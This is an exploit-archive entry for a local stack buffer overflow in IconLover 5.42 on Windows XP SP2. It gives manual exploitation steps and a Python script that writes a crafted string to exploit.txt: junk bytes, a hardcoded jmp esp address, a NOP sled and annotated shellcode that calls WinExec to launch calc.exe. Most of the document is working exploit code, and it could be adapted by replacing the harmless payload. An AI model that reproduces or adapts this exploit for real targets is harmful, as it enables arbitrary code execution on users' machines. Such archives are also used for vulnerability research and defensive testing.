IconLover 5.42 - Local Buffer Overflow Exploit
2015-09-29 19:05:20# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested : win XP professional sp2
'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]
#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609
Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45
Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Lybrary option
4. Click the Lybrary and push the Download button
5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide
6. Successful exploitation will open an instance of calc.exe!
'''
#!/usr/bin/env python
#badchars = "\x00\x0a\x0d"
junk = "\x41" * 1039
eip = "\xed\x1e\x94\x7c" #jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled ="\x90"*20
shellcode = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
shellcode += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
shellcode += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
shellcode += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
shellcode += "\xFF\xD3" #=> CALL EBX
shellcode += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX
shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
shellcode += "\xFF\xD3" #=> CALL EBX
packet = junk + eip + nopsled + shellcode + nopsled
file=open('exploit.txt','w')
file.write(packet)
file.close()
Fixes
No fixesIn order to submit a new fix you need to be registered.